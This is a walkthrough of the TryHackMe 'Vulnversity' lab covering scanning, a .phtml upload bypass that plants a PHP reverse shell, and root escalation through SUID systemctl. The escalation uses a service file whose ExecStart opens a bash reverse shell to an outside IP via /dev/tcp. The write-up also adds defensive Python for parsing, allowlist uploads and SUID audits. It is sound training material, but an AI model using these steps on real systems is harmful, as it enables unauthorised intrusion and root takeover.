# Vulnversity

### TryHackMe - [Vulnversity](https://tryhackme.com/room/vulnversity) Created By [tryhackme](https://tryhackme.com/p/tryhackme)

### Scanning (IP : 10.10.46.215)

#### 1. NMAP

```
> nmap -sC -sV 10.10.46.215 > nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 05:42 EDT
Nmap scan report for 10.10.187.173
Host is up (0.19s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
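The scan above is what decides where the rest of the enumeration goes: the only plain HTTP service is Apache on port 3333, with Squid on 3128 as a proxy. As an added example (not part of the original writeup), the following Python parses the text-mode port table of an `nmap -sV` report into records and picks out the HTTP services to hand to a directory brute-forcer. The sample report embedded in the block is constructed from the scan output above; the function names are my own.

```python
"""Parse the port table of a text-mode `nmap -sV` report into structured records.

Added example; the sample report is constructed from the scan shown above.
"""
import re
from typing import Dict, List

# Constructed sample: the port table from the scan above. NSE script lines
# (starting with '|') and the header/footer lines are skipped by the parser.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_ports(report: str) -> List[Dict[str, object]]:
    """Return one record per port line; script output and headers are ignored."""
    ports: List[Dict[str, object]] = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        rec: Dict[str, object] = m.groupdict()
        rec["port"] = int(m.group("port"))
        rec["version"] = (m.group("version") or "").strip()
        ports.append(rec)
    return ports


def web_targets(ports: List[Dict[str, object]], host: str) -> List[str]:
    """URLs worth feeding to gobuster: every open service nmap labelled plain 'http'.

    The port is always kept in the URL, because on this box the web server is
    on 3333 and nothing listens on 80.
    """
    return [
        f"http://{host}:{p['port']}"
        for p in ports
        if p["state"] == "open" and p["service"] == "http"
    ]


if __name__ == "__main__":
    parsed = parse_ports(SAMPLE_NMAP)
    for p in parsed:
        print(f"{p['port']:>5}/{p['proto']}  {p['service']:<12} {p['version']}")
    print("web targets:", web_targets(parsed, "10.10.46.215"))
```

Running it prints the port table and `['http://10.10.46.215:3333']`, which is the URL the gobuster run below needs; Squid (`http-proxy`) is deliberately left out, since a proxy port is a different kind of target.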

#### 2. GoBuster

```
> gobuster dir -u http://10.10.46.215:3333 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.54.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/14 05:45:27 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://10.10.187.173:3333/images/]
/css                  (Status: 301) [Size: 319] [--> http://10.10.187.173:3333/css/]   
/js                   (Status: 301) [Size: 318] [--> http://10.10.187.173:3333/js/]    
/fonts                (Status: 301) [Size: 321] [--> http://10.10.187.173:3333/fonts/] 
/internal             (Status: 301) [Size: 324] [--> http://10.10.187.173:3333/internal/]

[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:53:07 Finished
===============================================================


> gobuster dir -u http://10.10.46.215:3333/internal/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.54.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/14 05:53:39 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 332] [--> http://10.10.187.173:3333/internal/uploads/]
/css                  (Status: 301) [Size: 328] [--> http://10.10.187.173:3333/internal/css/]    

[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:54:16 Finished
===============================================================
```

### Upload Malicious PHP File <a href="#upload-malacious-php-fiile" id="upload-malacious-php-fiile"></a>

Some PHP extensions are blacklisted by the upload form, but the `.phtml` extension is accepted and still executed by the server. A PHP reverse shell ships with Kali Linux at `/usr/share/webshells/php/php-reverse-shell.php`. Change the IP in it to your own, start a netcat listener on port 1234 with `nc -lnvp 1234`, then upload the file and request it from `/internal/uploads/`. You get the reverse shell and can read `user.txt`.
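The reason `.phtml` gets through is the shape of the check, not a bug in a specific extension: a blacklist only stops the names its author thought of, while Ubuntu's Apache PHP module configuration hands `.phtml` and `.phar` to the PHP handler as well. The following Python is an added example (not the room's code) that models that weak check beside a hardened one: an allowlist of image extensions, a sanitised base name (which also rejects double extensions such as `x.php.png`), and a magic-number check so the content must match the extension. The constants and function names are my own.

```python
"""Extension blacklist versus allowlist for an upload handler (added example)."""
import os
import re

# Weak check, in the style of the target's upload form: a blacklist of a few
# PHP extensions. Anything not on the list passes, including .phtml.
BLACKLIST = {".php", ".php3", ".php4", ".php5"}


def blacklist_allows(filename: str) -> bool:
    """Vulnerable check: only the listed extensions are refused."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLIST


# Hardened check: allowlist of extensions, each paired with the file signature
# (magic bytes) a genuine file of that type starts with.
ALLOWLIST = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Base name: letters, digits, '_' and '-' only, so "shell.php" never becomes
# the base of "shell.php.png", and path separators cannot be smuggled in.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowlist_allows(filename: str, content: bytes) -> bool:
    """Hardened check: known extension, sanitised base name, matching content."""
    base, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWLIST:
        return False
    if not SAFE_NAME.match(base):
        return False
    return content.startswith(ALLOWLIST[ext])


if __name__ == "__main__":
    # Constructed uploads: a PHP payload under a blacklisted-looking name,
    # the same payload as .phtml, and a genuine PNG header.
    php_payload = b"<?php system($_GET['cmd']); ?>"
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    for name, data in [("shell.php", php_payload), ("shell.phtml", php_payload),
                       ("shell.php.png", png_header), ("logo.png", png_header)]:
        print(f"{name:<15} blacklist={blacklist_allows(name)!s:<5} "
              f"allowlist={allowlist_allows(name, data)}")
```

Even with the allowlist, the stored file should be renamed to a server-generated name and written outside the document root (or to a directory where script execution is disabled), so that a bypass of the name check never yields an executable page.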

### Privilege **Escalation** (root.txt) <a href="#privileges-escalations-root-txt" id="privileges-escalations-root-txt"></a>

I uploaded `linpeas.sh` to the target box to gather information about the system. It reported an unusual SUID binary, `/bin/systemctl`. Because the binary runs with root privileges, it can be used to enable and start a service, and that service runs as root on the target. Service file (`/var/tmp/root.service`):

```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
# Attacker IP and port; the port must match the netcat listener (nc -lnvp 1234)
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.21.93/1234 0>&1'

[Install]
WantedBy=multi-user.target
```

Now enable the service with `/bin/systemctl enable /var/tmp/root.service` and start it with `/bin/systemctl start root`, with a netcat listener (`nc -lnvp 1234`) waiting on your machine. You get a reverse shell with root privileges; now `cat /root/root.txt`.
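From the defender's side, the finding that made this escalation possible is a SUID-root binary that should not have the bit set. As an added example (not the room's code and not LinPEAS itself), the following Python performs the same check LinPEAS does when it lists unusual SUID files: it parses `find / -perm -4000 -type f -ls` output, keeps only setuid-root files, and flags anything absent from a baseline or known to be able to run commands as root when SUID. The sample output, the baseline, and the `SHELL_CAPABLE` set are constructed for this illustration; a real audit would generate the baseline from a golden image of the same distribution.

```python
"""Flag setuid-root binaries that are not expected on the host (added example)."""
from typing import Dict, List, Tuple

# Constructed sample in the shape of `find / -perm -4000 -type f -ls` output:
# inode, blocks, mode, links, owner, group, size, month, day, year, path.
SAMPLE_FIND_LS = """\
  123   44 -rwsr-xr-x   1 root root   44664 Jan 25  2018 /usr/bin/passwd
  456   40 -rwsr-xr-x   1 root root   40432 Jan 25  2018 /usr/bin/chsh
  789  628 -rwsr-xr-x   1 root root  642056 Jan 12  2019 /bin/systemctl
  321   32 -rwsr-xr-x   1 root root   30800 Jul 12  2016 /bin/fusermount
  654   20 -rwsr-xr-x   1 games games 20480 Jul 12  2016 /usr/games/scoreboard
"""

# Hypothetical baseline of setuid-root files expected on a stock Ubuntu 16.04 host.
BASELINE = {"/usr/bin/passwd", "/usr/bin/chsh", "/bin/fusermount", "/usr/bin/sudo", "/bin/su"}

# Binaries that hand out a root shell or root command execution when setuid-root.
# systemctl is here because, as above, it can enable and start a unit whose
# ExecStart runs as root.
SHELL_CAPABLE = {"systemctl", "bash", "find", "vim", "env", "python"}


def parse_find_ls(output: str) -> List[Tuple[str, str, str]]:
    """Return (mode, owner, path) per line; paths containing spaces are rejoined."""
    rows = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 11:
            continue  # blank or truncated line
        mode, owner = parts[2], parts[4]
        path = " ".join(parts[10:])
        rows.append((mode, owner, path))
    return rows


def suspicious_suid(rows: List[Tuple[str, str, str]],
                    baseline=BASELINE) -> List[Dict[str, object]]:
    """Setuid-root files that are off-baseline or can run commands as root."""
    findings = []
    for mode, owner, path in rows:
        setuid = len(mode) == 10 and mode[3] in "sS"  # 's' = setuid + exec, 'S' = setuid only
        if not (setuid and owner == "root"):
            continue  # setuid to a non-root user is a different (lesser) concern
        name = path.rsplit("/", 1)[-1]
        in_baseline = path in baseline
        shell_capable = name in SHELL_CAPABLE
        if not in_baseline or shell_capable:
            findings.append({"path": path, "in_baseline": in_baseline,
                             "shell_capable": shell_capable})
    return findings


if __name__ == "__main__":
    for f in suspicious_suid(parse_find_ls(SAMPLE_FIND_LS)):
        print(f"SUID-root {f['path']}: in_baseline={f['in_baseline']} "
              f"shell_capable={f['shell_capable']}")
```

On the sample data only `/bin/systemctl` is reported: it is both missing from the baseline and in the list of binaries that can run commands as root. The fix on the host is `chmod u-s /bin/systemctl`; the detection worth keeping is a periodic diff of setuid-root files against the baseline, since a new entry is exactly what a backdoored box looks like.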
